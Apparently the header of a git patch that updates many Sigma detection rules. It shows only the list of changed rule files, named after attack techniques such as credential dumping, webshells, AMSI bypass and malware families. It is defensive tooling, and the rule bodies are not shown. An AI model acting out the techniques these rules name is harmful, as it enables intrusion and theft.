From 3e19428c8384a270964121821e64612aa0c3884c Mon Sep 17 00:00:00 2001 From: YamatoSecurity Date: Sat, 20 Jan 2024 01:48:34 +0000 Subject: [PATCH] Sigma Rule Update (2024-01-20 01:48:33) --- .../Other/win_av_relevant_match.yml | 12 +- .../win_application_msmpeng_crash_error.yml | 8 +- ...in_werfault_susp_lsass_credential_dump.yml | 6 +- .../esent/win_esent_ntdsutil_abuse.yml | 1 + ...win_esent_ntdsutil_abuse_susp_location.yml | 7 +- .../win_audit_cve.yml | 13 +- ...in_software_restriction_policies_block.yml | 13 +- .../win_builtin_remove_application.yml | 1 + .../win_msi_install_from_susp_locations.yml | 8 +- .../msiinstaller/win_msi_install_from_web.yml | 1 + .../win_software_atera_rmm_agent_install.yml | 3 +- .../win_mssql_add_sysadmin_account.yml | 7 +- .../win_mssql_disable_audit_settings.yml | 10 +- .../mssqlserver/win_mssql_failed_logon.yml | 8 +- ...sql_failed_logon_from_external_network.yml | 17 +- .../win_mssql_sp_procoption_set.yml | 8 +- .../win_mssql_xp_cmdshell_audit_log.yml | 8 +- .../win_mssql_xp_cmdshell_change.yml | 4 +- ...ccess_tools_screenconnect_command_exec.yml | 4 +- ...cess_tools_screenconnect_file_transfer.yml | 4 +- .../win_application_msmpeng_crash_wer.yml | 4 +- ..._applocker_file_was_not_allowed_to_run.yml | 4 +- ...time_sysinternals_tools_appx_execution.yml | 4 +- ...n_appxdeployment_server_mal_appx_names.yml | 8 +- ...win_appxdeployment_server_policy_block.yml | 3 +- ..._server_susp_appx_package_installation.yml | 6 +- ...win_appxdeployment_server_susp_domains.yml | 5 +- ...ployment_server_susp_package_locations.yml | 4 +- ...ment_server_uncommon_package_locations.yml | 8 +- ...n_appxpackaging_om_sups_appx_signature.yml | 8 +- .../win_bits_client_new_job_via_bitsadmin.yml | 3 +- ...nt_new_transfer_saving_susp_extensions.yml | 10 +- ..._new_transfer_via_file_sharing_domains.yml | 2 +- ...its_client_new_transfer_via_ip_address.yml | 15 +- ...s_client_new_transfer_via_uncommon_tld.yml | 10 +- ..._client_new_trasnfer_susp_local_folder.yml | 4 +- ..._capi2_acquire_certificate_private_key.yml | 5 +- .../category/antivirus/av_exploiting.yml | 5 +- .../category/antivirus/av_hacktool.yml | 94 +- .../category/antivirus/av_password_dumper.yml | 38 +- .../category/antivirus/av_ransomware.yml | 2 +- .../category/antivirus/av_relevant_files.yml | 7 +- .../category/antivirus/av_webshell.yml | 115 +- ...sclient_lifecycle_system_cert_exported.yml | 8 +- .../win_codeintegrity_attempted_dll_load.yml | 34 +- ...tegrity_blocked_protected_process_file.yml | 5 +- ...in_codeintegrity_enforced_policy_block.yml | 5 +- ...n_codeintegrity_revoked_driver_blocked.yml | 2 +- ...in_codeintegrity_revoked_driver_loaded.yml | 4 +- ...in_codeintegrity_revoked_image_blocked.yml | 2 +- ...win_codeintegrity_revoked_image_loaded.yml | 4 +- ...n_codeintegrity_unsigned_driver_loaded.yml | 2 +- ...in_codeintegrity_unsigned_image_loaded.yml | 2 +- .../win_codeintegrity_whql_failure.yml | 4 +- sigma/builtin/deprecated/posh_pm_powercat.yml | 3 +- .../posh_ps_access_to_chrome_login_data.yml | 14 +- .../posh_ps_azurehound_commands.yml | 3 +- .../posh_ps_cl_mutexverifiers_lolscript.yml | 3 +- .../posh_ps_file_and_directory_discovery.yml | 14 +- .../builtin/deprecated/posh_ps_susp_gwmi.yml | 3 +- ...ershell_suspicious_invocation_specific.yml | 3 +- ...owershell_syncappvpublishingserver_exe.yml | 9 +- ...proc_creation_win_apt_apt29_thinktanks.yml | 5 +- .../proc_creation_win_apt_dragonfly.yml | 2 +- .../proc_creation_win_apt_gallium.yml | 9 +- .../proc_creation_win_apt_hurricane_panda.yml | 10 +- ...reation_win_apt_lazarus_activity_apr21.yml | 11 +- .../proc_creation_win_apt_lazarus_loader.yml | 14 +- ..._creation_win_apt_muddywater_dnstunnel.yml | 4 +- .../proc_creation_win_apt_ta505_dropper.yml | 7 +- ...c_creation_win_certutil_susp_execution.yml | 12 +- .../proc_creation_win_cmd_read_contents.yml | 20 +- ...oc_creation_win_cmd_redirect_to_stream.yml | 9 +- ...tial_acquisition_registry_hive_dumping.yml | 8 +- .../proc_creation_win_cscript_vbs.yml | 14 +- ...ion_mssql_xp_cmdshell_stored_procedure.yml | 16 +- .../proc_creation_win_indirect_cmd.yml | 6 +- ...in_indirect_command_execution_forfiles.yml | 14 +- ...tion_win_invoke_obfuscation_via_rundll.yml | 4 +- ...in_invoke_obfuscation_via_use_rundll32.yml | 4 +- ...eation_win_lolbas_execution_of_wuauclt.yml | 7 +- .../proc_creation_win_lolbin_findstr.yml | 20 +- .../proc_creation_win_lolbin_office.yml | 7 +- .../proc_creation_win_lolbin_rdrleakdiag.yml | 6 +- ...ion_win_lolbins_by_office_applications.yml | 9 +- .../deprecated/proc_creation_win_mal_ryuk.yml | 10 +- ...on_win_malware_trickbot_recon_activity.yml | 12 +- .../proc_creation_win_mavinject_proc_inj.yml | 2 +- .../proc_creation_win_msdt_diagcab.yml | 9 +- ...proc_creation_win_new_service_creation.yml | 6 +- ...tion_win_nslookup_pwsh_download_cradle.yml | 9 +- .../proc_creation_win_odbcconf_susp_exec.yml | 10 +- ..._from_proxy_executing_regsvr32_payload.yml | 23 +- ...from_proxy_executing_regsvr32_payload2.yml | 23 +- ...on_win_office_spawning_wmi_commandline.yml | 8 +- ...creation_win_possible_applocker_bypass.yml | 16 +- ...n_powershell_amsi_bypass_pattern_nov22.yml | 7 +- ..._powershell_base64_invoke_susp_cmdlets.yml | 12 +- ...n_powershell_base64_listing_shadowcopy.yml | 3 +- ...eation_win_powershell_base64_shellcode.yml | 2 +- .../proc_creation_win_powershell_bitsjob.yml | 4 +- ...on_win_powershell_service_modification.yml | 15 +- ...ion_win_powershell_xor_encoded_command.yml | 22 +- .../proc_creation_win_reg_dump_sam.yml | 12 +- .../proc_creation_win_regsvr32_anomalies.yml | 44 +- .../proc_creation_win_renamed_paexec.yml | 27 +- ...reation_win_root_certificate_installed.yml | 18 +- .../proc_creation_win_run_from_zip.yml | 5 +- ...roc_creation_win_sc_delete_av_services.yml | 25 +- .../proc_creation_win_schtasks_user_temp.yml | 6 +- .../proc_creation_win_service_stop.yml | 33 +- .../proc_creation_win_susp_bitstransfer.yml | 7 +- ...eation_win_susp_cmd_exectution_via_wmi.yml | 9 +- ...oc_creation_win_susp_commandline_chars.yml | 27 +- ...c_creation_win_susp_lolbin_non_c_drive.yml | 17 +- .../proc_creation_win_susp_run_folder.yml | 24 +- ...proc_creation_win_susp_squirrel_lolbin.yml | 14 +- ..._sysinternals_psexec_service_execution.yml | 8 +- ...eation_win_sysinternals_psexesvc_start.yml | 2 +- .../proc_creation_win_whoami_as_system.yml | 9 +- .../proc_creation_win_winword_dll_load.yml | 4 +- ..._win_wmic_execution_via_office_process.yml | 15 +- .../proc_creation_win_wmic_remote_command.yml | 6 +- .../proc_creation_win_wmic_remote_service.yml | 24 +- .../proc_creation_win_wuauclt_execution.yml | 8 +- ..._creation_syncappvpublishingserver_exe.yml | 7 +- ...add_sysinternals_sdelete_registry_keys.yml | 5 +- ...istry_event_asep_reg_keys_modification.yml | 23 +- ...sing_windows_telemetry_for_persistence.yml | 14 +- .../registry_set_add_hidden_user.yml | 3 +- ...ble_microsoft_office_security_features.yml | 5 + .../registry_set_office_security.yml | 3 +- .../registry_set_silentprocessexit.yml | 3 +- .../deprecated/sysmon_rclone_execution.yml | 9 +- .../deprecated/win_defender_disabled.yml | 10 +- .../win_dsquery_domain_trust_discovery.yml | 12 +- .../win_lateral_movement_condrv.yml | 7 +- ...in_security_group_modification_logging.yml | 53 +- ...in_security_lolbas_execution_of_nltest.yml | 9 +- .../deprecated/win_susp_esentutl_activity.yml | 6 +- .../win_susp_vssadmin_ntds_activity.yml | 5 +- ..._service_install_susp_double_ampersand.yml | 3 +- ...diagnosis_scripted_load_remote_diagcab.yml | 5 +- .../win_dns_client__mal_cobaltstrike.yml | 10 +- .../win_dns_client_anonymfiles_com.yml | 10 +- .../dns_client/win_dns_client_mega_nz.yml | 7 +- .../dns_client/win_dns_client_tor_onion.yml | 7 +- .../dns_client/win_dns_client_ufile_io.yml | 13 +- ...in_dns_server_failed_dns_zone_transfer.yml | 2 +- ...ns_server_susp_server_level_plugin_dll.yml | 11 +- .../win_usb_device_plugged.yml | 9 +- .../Axiom/proc_creation_win_apt_zxshell.yml | 4 +- ...eation_win_apt_turla_commands_critical.yml | 2 +- ...oc_creation_win_apt_turla_comrat_may20.yml | 4 +- ...roc_creation_win_exploit_cve_2015_1641.yml | 5 +- ...roc_creation_win_exploit_cve_2017_0261.yml | 8 +- ...oc_creation_win_exploit_cve_2017_11882.yml | 3 +- ...roc_creation_win_exploit_cve_2017_8759.yml | 5 +- .../proc_creation_win_malware_adwind.yml | 16 +- .../proc_creation_win_malware_fireball.yml | 2 +- .../proc_creation_win_malware_notpetya.yml | 12 +- ...n_win_malware_plugx_susp_exe_locations.yml | 60 +- .../StoneDrill/win_system_apt_stonedrill.yml | 3 +- .../proc_creation_win_malware_wannacry.yml | 64 +- ...oc_creation_win_apt_apt10_cloud_hopper.yml | 9 +- .../proc_creation_win_apt_ta17_293a_ps.yml | 5 +- ...on_win_apt_lazarus_binary_masquerading.yml | 7 +- .../win_system_apt_carbonpaper_turla.yml | 3 +- .../win_system_apt_turla_service_png.yml | 3 +- .../proc_creation_win_malware_elise.yml | 8 +- ..._creation_win_apt_apt27_emissary_panda.yml | 9 +- .../TA/APT28/proc_creation_win_apt_sofacy.yml | 16 +- ...apt_apt29_phishing_campaign_indicators.yml | 15 +- ...c_creation_win_apt_muddywater_activity.yml | 6 +- .../proc_creation_win_apt_oilrig_mar18.yml | 27 +- .../OilRig/win_security_apt_oilrig_mar18.yml | 18 +- .../TA/OilRig/win_system_apt_oilrig_mar18.yml | 18 +- .../proc_creation_win_apt_slingshot.yml | 9 +- .../Slingshot/win_security_apt_slingshot.yml | 7 +- .../proc_creation_win_apt_tropictrooper.yml | 5 +- ...roc_creation_win_exploit_other_bearlpe.yml | 9 +- ...roc_creation_win_exploit_cve_2019_1388.yml | 9 +- .../proc_creation_win_malware_babyshark.yml | 15 +- .../proc_creation_win_malware_dridex.yml | 25 +- .../proc_creation_win_malware_dtrack.yml | 6 +- .../proc_creation_win_malware_emotet.yml | 25 +- .../proc_creation_win_malware_formbook.yml | 40 +- ...tion_win_malware_lockergoga_ransomware.yml | 2 +- .../QBot/proc_creation_win_malware_qbot.yml | 9 +- .../Ryuk/proc_creation_win_malware_ryuk.yml | 21 +- ...creation_win_malware_snatch_ransomware.yml | 10 +- ...c_creation_win_apt_aptc12_bluemushroom.yml | 8 +- ...creation_win_apt_apt31_judgement_panda.yml | 9 +- ...c_creation_win_apt_bear_activity_gtr19.yml | 7 +- .../proc_creation_win_apt_empiremonkey.yml | 4 +- ...ation_win_apt_equationgroup_dll_u_load.yml | 11 +- .../proc_creation_win_apt_mustangpanda.yml | 22 +- .../proc_creation_win_apt_wocao.yml | 9 +- .../CVE-2020-0688/win_vul_cve_2020_0688.yml | 3 +- ...oc_creation_win_exploit_cve_2020_10189.yml | 5 +- ...roc_creation_win_exploit_cve_2020_1048.yml | 9 +- ...roc_creation_win_exploit_cve_2020_1350.yml | 5 +- ..._creation_win_malware_blue_mockingbird.yml | 12 +- ..._win_malware_emotet_rundll32_execution.yml | 12 +- ...creation_win_malware_ke3chang_tidepool.yml | 10 +- ...c_creation_win_malware_maze_ransomware.yml | 15 +- .../proc_creation_win_apt_evilnum_jul20.yml | 5 +- .../proc_creation_win_apt_gallium_iocs.yml | 83 +- .../GALLIUM/win_dns_analytic_apt_gallium.yml | 10 +- .../proc_creation_win_apt_greenbug_may20.yml | 13 +- ...reation_win_apt_lazarus_group_activity.yml | 22 +- .../proc_creation_win_apt_unc2452_cmds.yml | 22 +- .../proc_creation_win_apt_unc2452_ps.yml | 8 +- ...ation_win_apt_unc2452_vbscript_pattern.yml | 4 +- .../proc_creation_win_apt_taidoor.yml | 9 +- ...c_creation_win_apt_winnti_mal_hk_jan20.yml | 13 +- .../proc_creation_win_apt_winnti_pipemon.yml | 9 +- .../av_printernightmare_cve_2021_34527.yml | 8 +- ...win_exploit_cve_2021_1675_printspooler.yml | 6 +- ...cve_2021_1675_printspooler_operational.yml | 3 +- ...it_cve_2021_1675_printspooler_security.yml | 6 +- ...it_cve_2021_26084_atlassian_confluence.yml | 6 +- ..._win_exploit_cve_2021_26857_msexchange.yml | 6 +- ...ation_win_exploit_cve_2021_35211_servu.yml | 10 +- ...oc_creation_win_exploit_cve_2021_40444.yml | 7 +- ..._2021_40444_office_directory_traversal.yml | 6 +- ...oc_creation_win_exploit_cve_2021_41379.yml | 21 +- .../CVE-2021-41379/win_vul_cve_2021_41379.yml | 1 + .../win_system_exploit_cve_2021_42278.yml | 25 +- ...samaccountname_spoofing_cve_2021_42287.yml | 5 +- ...n_win_exploit_other_razorinstaller_lpe.yml | 9 +- ...tion_win_exploit_other_systemnightmare.yml | 5 +- ...cve_2021_31979_cve_2021_33771_exploits.yml | 4 +- .../Exploits/win_exchange_cve_2021_42321.yml | 4 +- ...ation_win_malware_blackbyte_ransomware.yml | 9 +- .../Conti/proc_creation_win_malware_conti.yml | 2 +- .../proc_creation_win_malware_conti_7zip.yml | 2 +- ..._win_malware_conti_ransomware_commands.yml | 4 +- ...malware_conti_ransomware_database_dump.yml | 14 +- ...eation_win_malware_darkside_ransomware.yml | 4 +- ...win_malware_devil_bait_output_redirect.yml | 14 +- ...win_malware_goofy_guineapig_broken_cmd.yml | 5 +- ...g_googleupdate_uncommon_child_instance.yml | 13 +- ...creation_win_malware_pingback_backdoor.yml | 13 +- ...eation_win_malware_small_sieve_cli_arg.yml | 5 +- ...y_set_malware_small_sieve_evasion_typo.yml | 7 +- .../HAFNIUM/proc_creation_win_apt_hafnium.yml | 33 +- .../proc_creation_win_apt_revil_kaseya.yml | 9 +- .../proc_creation_win_apt_sourgrum.yml | 8 +- ...win_exploit_cve_2023_21554_queuejumper.yml | 2 +- ...eation_win_exploit_cve_2022_29072_7zip.yml | 20 +- ..._win_exploit_cve_2022_41120_sysmon_eop.yml | 13 +- ...re_bluesky_ransomware_files_indicators.yml | 11 +- ...on_win_malware_hermetic_wiper_activity.yml | 19 +- ...raspberry_robin_single_dot_ending_file.yml | 8 +- .../2022/Malware/win_mssql_sp_maggie.yml | 3 +- ..._creation_win_apt_actinium_persistence.yml | 5 +- .../MERCURY/proc_creation_win_apt_mercury.yml | 4 +- ...023_22518_confluence_tomcat_child_proc.yml | 24 +- ...ve_2023_23397_outlook_reminder_trigger.yml | 5 +- ...e_2023_23397_outlook_remote_file_query.yml | 12 +- ...oit_cve_2023_23397_outlook_remote_file.yml | 25 +- ..._windows_html_rce_share_access_pattern.yml | 6 +- ...ploit_cve_2023_38831_winrar_child_proc.yml | 30 +- ...on_exploit_cve_2023_40477_winrar_crash.yml | 4 +- .../Exploits/win_msmq_corrupted_packet.yml | 3 +- ...in_malware_coldsteel_anonymous_process.yml | 3 +- ..._malware_coldsteel_service_persistence.yml | 7 +- ...ry_set_malware_coldsteel_created_users.yml | 3 +- ..._malware_coldsteel_persistence_service.yml | 3 +- ..._autoit3_from_susp_parent_and_location.yml | 17 +- ...win_malware_darkgate_net_user_creation.yml | 8 +- ..._creation_win_malware_griffon_patterns.yml | 5 +- ...ware_icedid_rundll32_dllregisterserver.yml | 12 +- ...re_pikabot_combined_commands_execution.yml | 24 +- ...win_malware_pikabot_rundll32_discovery.yml | 17 +- ...win_malware_pikabot_rundll32_hollowing.yml | 15 +- ...n_malware_qakbot_regsvr32_calc_pattern.yml | 10 +- ..._win_malware_qakbot_rundll32_execution.yml | 11 +- ...on_win_malware_qakbot_rundll32_exports.yml | 16 +- ...are_qakbot_rundll32_fake_dll_execution.yml | 12 +- ...win_malware_qakbot_uninstaller_cleanup.yml | 17 +- ...alware_rhadamanthys_stealer_dll_launch.yml | 12 +- ..._malware_rorschach_ransomware_activity.yml | 4 +- ...n_win_malware_snake_installer_cli_args.yml | 9 +- ...ation_win_malware_snake_installer_exec.yml | 11 +- ...on_win_malware_snake_service_execution.yml | 8 +- ...y_event_malware_snake_covert_store_key.yml | 3 +- ...gistry_set_malware_snake_encrypted_key.yml | 11 +- ...stem_malware_snake_persistence_service.yml | 6 +- ...n_win_malware_3cx_compromise_execution.yml | 91 +- ...n_malware_3cx_compromise_susp_children.yml | 33 +- ...win_malware_3cx_compromise_susp_update.yml | 35 +- ...ity_apt_cozy_bear_scheduled_tasks_name.yml | 4 +- ..._cozy_bear_graphical_proton_task_names.yml | 14 +- ...ation_win_apt_diamond_sleet_indicators.yml | 5 +- ...event_apt_diamond_sleet_scheduled_task.yml | 6 +- ...urity_apt_diamond_sleet_scheduled_task.yml | 10 +- .../TA/FIN7/posh_ps_apt_fin7_powerhold.yml | 3 +- ...n_apt_fin7_powertrash_lateral_movement.yml | 7 +- ...posh_ps_apt_lace_tempest_eraser_script.yml | 6 +- ...h_ps_apt_lace_tempest_malware_launcher.yml | 6 +- ...pt_lace_tempest_cobalt_strike_download.yml | 5 +- ..._win_apt_lace_tempest_loader_execution.yml | 5 +- ...storm_aspera_faspex_susp_child_process.yml | 115 +- ...int_sandstorm_log4j_wstomcat_execution.yml | 2 +- ...storm_manage_engine_susp_child_process.yml | 118 +- ...ation_win_apt_mustang_panda_indicators.yml | 7 +- ...int_management_exploitation_indicators.yml | 4 +- ...t_print_management_exploitation_pc_app.yml | 5 +- ...ion_win_apt_peach_sandstorm_indicators.yml | 2 +- .../firewall_as/win_firewall_as_add_rule.yml | 30 +- .../win_firewall_as_add_rule_susp_folder.yml | 14 +- .../win_firewall_as_change_rule.yml | 7 +- .../win_firewall_as_delete_all_rules.yml | 10 +- .../win_firewall_as_delete_rule.yml | 12 +- .../win_firewall_as_failed_load_gpo.yml | 5 +- .../win_firewall_as_reset_config.yml | 7 +- .../win_firewall_as_setting_change.yml | 14 +- .../win_lsa_server_normal_user_admin.yml | 26 +- .../win_exchange_proxylogon_oabvirtualdir.yml | 3 +- ...ange_proxyshell_certificate_generation.yml | 3 +- ...win_exchange_proxyshell_mailbox_export.yml | 6 +- ...hange_proxyshell_remove_mailbox_export.yml | 3 +- ...ge_set_oabvirtualdirectory_externalurl.yml | 3 +- .../win_exchange_transportagent.yml | 7 +- .../win_exchange_transportagent_failed.yml | 4 +- sigma/builtin/ntlm/win_susp_ntlm_auth.yml | 5 +- sigma/builtin/ntlm/win_susp_ntlm_rdp.yml | 3 +- ...shd_openssh_server_listening_on_socket.yml | 3 +- ...on_win_userdomain_variable_enumeration.yml | 2 +- ...osh_pc_abuse_nslookup_with_dns_records.yml | 7 +- .../posh_pc_delete_volume_shadow_copies.yml | 3 +- .../posh_pc_downgrade_attack.yml | 3 +- .../posh_pc_exe_calling_ps.yml | 3 +- .../powershell_classic/posh_pc_powercat.yml | 7 +- .../posh_pc_remote_powershell_session.yml | 5 +- .../posh_pc_remotefxvgpudisablement_abuse.yml | 20 +- .../posh_pc_renamed_powershell.yml | 2 + .../posh_pc_susp_download.yml | 4 +- .../posh_pc_susp_get_nettcpconnection.yml | 4 +- .../posh_pc_susp_zip_compress.yml | 26 +- ...posh_pc_tamper_windows_defender_set_mp.yml | 13 +- ...sh_pc_wsman_com_provider_no_powershell.yml | 4 +- .../posh_pc_xor_commandline.yml | 3 +- ..._pm_active_directory_module_dll_import.yml | 11 +- .../posh_pm_alternate_powershell_hosts.yml | 13 +- .../posh_pm_bad_opsec_artifacts.yml | 18 +- .../posh_pm_clear_powershell_history.yml | 6 +- .../posh_pm_decompress_commands.yml | 7 +- .../posh_pm_exploit_scripts.yml | 17 +- .../posh_pm_get_addbaccount.yml | 4 +- .../posh_pm_get_clipboard.yml | 3 +- .../posh_pm_invoke_obfuscation_clip.yml | 6 +- ...h_pm_invoke_obfuscation_obfuscated_iex.yml | 22 +- .../posh_pm_invoke_obfuscation_stdin.yml | 6 +- .../posh_pm_invoke_obfuscation_var.yml | 6 +- ...osh_pm_invoke_obfuscation_via_compress.yml | 6 +- .../posh_pm_invoke_obfuscation_via_rundll.yml | 6 +- .../posh_pm_invoke_obfuscation_via_stdin.yml | 6 +- ...osh_pm_invoke_obfuscation_via_use_clip.yml | 6 +- ...sh_pm_invoke_obfuscation_via_use_mhsta.yml | 6 +- ...pm_invoke_obfuscation_via_use_rundll32.yml | 4 +- .../posh_pm_invoke_obfuscation_via_var.yml | 8 +- .../posh_pm_malicious_commandlets.yml | 39 +- .../posh_pm_remote_powershell_session.yml | 4 +- .../posh_pm_remotefxvgpudisablement_abuse.yml | 20 +- .../posh_pm_susp_ad_group_reco.yml | 37 +- .../posh_pm_susp_download.yml | 4 +- .../posh_pm_susp_get_nettcpconnection.yml | 4 +- .../posh_pm_susp_invocation_generic.yml | 8 +- .../posh_pm_susp_invocation_specific.yml | 12 +- .../posh_pm_susp_local_group_reco.yml | 37 +- ..._pm_susp_reset_computermachinepassword.yml | 8 +- .../posh_pm_susp_smb_share_reco.yml | 16 +- .../posh_pm_susp_zip_compress.yml | 26 +- .../posh_pm_syncappvpublishingserver_exe.yml | 13 +- ...posh_ps_aadinternals_cmdlets_execution.yml | 9 +- .../posh_ps_access_to_browser_login_data.yml | 22 +- ..._ps_active_directory_module_dll_import.yml | 11 +- .../posh_ps_add_dnsclient_rule.yml | 10 +- .../posh_ps_add_windows_capability.yml | 12 +- .../posh_ps_adrecon_execution.yml | 5 +- .../posh_ps_amsi_bypass_pattern_nov22.yml | 3 +- .../posh_ps_amsi_null_bits_bypass.yml | 7 +- .../posh_ps_apt_silence_eda.yml | 2 + .../posh_ps_as_rep_roasting.yml | 4 +- .../posh_ps_audio_exfiltration.yml | 2 + .../posh_ps_automated_collection.yml | 3 +- .../posh_ps_capture_screenshots.yml | 10 +- .../posh_ps_clear_powershell_history.yml | 6 +- ...sh_ps_clearing_windows_console_history.yml | 4 +- .../posh_ps_cmdlet_scheduled_task.yml | 3 +- ...h_ps_computer_discovery_get_adcomputer.yml | 10 +- .../posh_ps_copy_item_system_directory.yml | 3 +- .../posh_ps_cor_profiler.yml | 17 +- .../posh_ps_create_volume_shadow_copy.yml | 3 +- .../posh_ps_detect_vm_env.yml | 10 +- .../posh_ps_directorysearcher.yml | 3 +- ...ps_directoryservices_accountmanagement.yml | 11 +- ..._ps_disable_psreadline_command_history.yml | 3 +- ...sh_ps_disable_windows_optional_feature.yml | 12 +- .../posh_ps_dnscat_execution.yml | 2 +- .../posh_ps_dotnet_assembly_from_file.yml | 3 +- .../posh_ps_download_com_cradles.yml | 7 +- ...mp_password_windows_credential_manager.yml | 10 +- .../posh_ps_enable_psremoting.yml | 4 +- ...s_enable_susp_windows_optional_feature.yml | 15 +- ...te_password_windows_credential_manager.yml | 10 +- .../posh_ps_etw_trace_evasion.yml | 8 +- ..._exchange_mailbox_smpt_forwarding_rule.yml | 3 +- .../posh_ps_export_certificate.yml | 11 +- .../posh_ps_frombase64string_archive.yml | 8 +- .../posh_ps_get_acl_service.yml | 12 +- .../posh_ps_get_adcomputer.yml | 3 +- .../powershell_script/posh_ps_get_adgroup.yml | 3 +- .../posh_ps_get_adreplaccount.yml | 10 +- .../posh_ps_get_childitem_bookmarks.yml | 14 +- ...et_process_security_software_discovery.yml | 20 +- .../powershell_script/posh_ps_hktl_rubeus.yml | 7 +- .../powershell_script/posh_ps_hktl_winpwn.yml | 13 +- .../powershell_script/posh_ps_hotfix_enum.yml | 3 +- .../posh_ps_icmp_exfiltration.yml | 4 +- .../posh_ps_import_module_susp_dirs.yml | 5 +- ...posh_ps_install_unsigned_appx_packages.yml | 7 +- .../posh_ps_invoke_command_remote.yml | 4 +- .../posh_ps_invoke_dnsexfiltration.yml | 17 +- .../posh_ps_invoke_obfuscation_clip.yml | 2 +- ...h_ps_invoke_obfuscation_obfuscated_iex.yml | 15 +- .../posh_ps_invoke_obfuscation_stdin.yml | 2 +- .../posh_ps_invoke_obfuscation_var.yml | 2 +- ...osh_ps_invoke_obfuscation_via_compress.yml | 2 +- .../posh_ps_invoke_obfuscation_via_rundll.yml | 2 +- .../posh_ps_invoke_obfuscation_via_stdin.yml | 2 +- ...osh_ps_invoke_obfuscation_via_use_clip.yml | 2 +- ...sh_ps_invoke_obfuscation_via_use_mhsta.yml | 2 +- .../posh_ps_invoke_obfuscation_via_var.yml | 4 +- .../powershell_script/posh_ps_keylogging.yml | 5 +- .../powershell_script/posh_ps_localuser.yml | 9 +- .../posh_ps_mailboxexport_share.yml | 7 +- .../posh_ps_malicious_commandlets.yml | 56 +- .../posh_ps_malicious_keywords.yml | 4 +- ...ps_memorydump_getstoragediagnosticinfo.yml | 3 +- .../posh_ps_modify_group_policy_settings.yml | 7 +- .../powershell_script/posh_ps_msxml_com.yml | 13 +- .../posh_ps_nishang_malicious_commandlets.yml | 18 +- .../posh_ps_ntfs_ads_access.yml | 3 +- .../posh_ps_office_comobject_registerxll.yml | 7 +- .../posh_ps_potential_invoke_mimikatz.yml | 3 +- ...osh_ps_powerview_malicious_commandlets.yml | 60 +- .../posh_ps_psasyncshell.yml | 3 +- .../posh_ps_remote_session_creation.yml | 9 +- .../posh_ps_remotefxvgpudisablement_abuse.yml | 17 +- .../posh_ps_request_kerberos_ticket.yml | 8 +- .../posh_ps_resolve_list_of_ip_from_file.yml | 6 +- .../posh_ps_root_certificate_installed.yml | 6 +- .../posh_ps_run_from_mount_diskimage.yml | 3 +- ...osh_ps_script_with_upload_capabilities.yml | 3 +- .../posh_ps_send_mailmessage.yml | 10 +- .../posh_ps_sensitive_file_discovery.yml | 4 +- .../powershell_script/posh_ps_set_acl.yml | 12 +- .../posh_ps_set_acl_susp_location.yml | 14 +- ...posh_ps_set_policies_to_unsecure_level.yml | 15 +- ...sh_ps_shellintel_malicious_commandlets.yml | 1 + .../posh_ps_software_discovery.yml | 7 +- .../posh_ps_susp_ace_tampering.yml | 4 +- .../posh_ps_susp_ad_group_reco.yml | 13 +- .../posh_ps_susp_alias_obfscuation.yml | 12 +- .../posh_ps_susp_clear_eventlog.yml | 11 +- .../posh_ps_susp_directory_enum.yml | 3 +- .../posh_ps_susp_download.yml | 4 +- .../posh_ps_susp_execute_batch_script.yml | 22 +- .../posh_ps_susp_extracting.yml | 14 +- .../posh_ps_susp_follina_execution.yml | 3 +- ...susp_get_addefaultdomainpasswordpolicy.yml | 3 +- .../posh_ps_susp_getprocess_lsass.yml | 6 +- .../posh_ps_susp_hyper_v_condlet.yml | 3 +- .../posh_ps_susp_invocation_generic.yml | 8 +- .../posh_ps_susp_invocation_specific.yml | 12 +- ...sh_ps_susp_invoke_webrequest_useragent.yml | 11 +- .../posh_ps_susp_iofilestream.yml | 3 +- .../posh_ps_susp_keylogger_activity.yml | 3 +- .../posh_ps_susp_keywords.yml | 6 +- .../posh_ps_susp_local_group_reco.yml | 13 +- .../posh_ps_susp_mail_acces.yml | 10 +- .../posh_ps_susp_mount_diskimage.yml | 3 +- .../posh_ps_susp_mounted_share_deletion.yml | 4 +- .../posh_ps_susp_networkcredential.yml | 10 +- .../posh_ps_susp_new_psdrive.yml | 3 +- .../posh_ps_susp_proxy_scripts.yml | 3 +- .../posh_ps_susp_recon_export.yml | 3 +- .../posh_ps_susp_remove_adgroupmember.yml | 10 +- ..._service_dacl_modification_set_service.yml | 8 +- .../posh_ps_susp_set_alias.yml | 7 +- .../posh_ps_susp_smb_share_reco.yml | 14 +- .../posh_ps_susp_ssl_keyword.yml | 4 +- .../posh_ps_susp_unblock_file.yml | 3 +- .../posh_ps_susp_wallpaper.yml | 10 +- .../posh_ps_susp_win32_pnpentity.yml | 3 +- .../posh_ps_susp_win32_shadowcopy.yml | 3 +- ...posh_ps_susp_win32_shadowcopy_deletion.yml | 12 +- .../posh_ps_susp_windowstyle.yml | 10 +- .../posh_ps_susp_write_eventlog.yml | 7 +- .../posh_ps_susp_zip_compress.yml | 26 +- .../posh_ps_syncappvpublishingserver_exe.yml | 13 +- ...posh_ps_tamper_windows_defender_rem_mp.yml | 7 +- ...posh_ps_tamper_windows_defender_set_mp.yml | 13 +- .../posh_ps_test_netconnection.yml | 10 +- .../powershell_script/posh_ps_timestomp.yml | 10 +- .../posh_ps_token_obfuscation.yml | 20 +- .../posh_ps_user_discovery_get_aduser.yml | 10 +- .../posh_ps_user_profile_tampering.yml | 9 +- ..._ps_using_set_service_to_hide_services.yml | 8 +- ...osh_ps_veeam_credential_dumping_script.yml | 3 +- .../posh_ps_web_request_cmd_and_cmdlets.yml | 8 +- .../posh_ps_win32_nteventlogfile_usage.yml | 3 +- .../posh_ps_win32_product_install_msi.yml | 3 +- .../posh_ps_win_api_susp_access.yml | 5 +- .../posh_ps_win_defender_exclusions_added.yml | 7 +- ...h_ps_windows_firewall_profile_disabled.yml | 7 +- .../posh_ps_winlogon_helper_dll.yml | 15 +- .../posh_ps_wmi_persistence.yml | 24 +- .../posh_ps_wmi_unquoted_service_search.yml | 7 +- .../powershell_script/posh_ps_wmimplant.yml | 3 + .../posh_ps_x509enrollment.yml | 4 +- .../powershell_script/posh_ps_xml_iex.yml | 13 +- ...proc_creation_win_7zip_exfil_dmp_files.yml | 28 +- ...creation_win_7zip_password_compression.yml | 23 +- ..._creation_win_7zip_password_extraction.yml | 24 +- ...ation_win_addinutil_suspicious_cmdline.yml | 24 +- ...n_win_addinutil_uncommon_child_process.yml | 9 +- ...reation_win_addinutil_uncommon_cmdline.yml | 16 +- ...eation_win_addinutil_uncommon_dir_exec.yml | 9 +- .../proc_creation_win_adplus_memory_dump.yml | 13 +- ...tion_win_agentexecutor_potential_abuse.yml | 28 +- 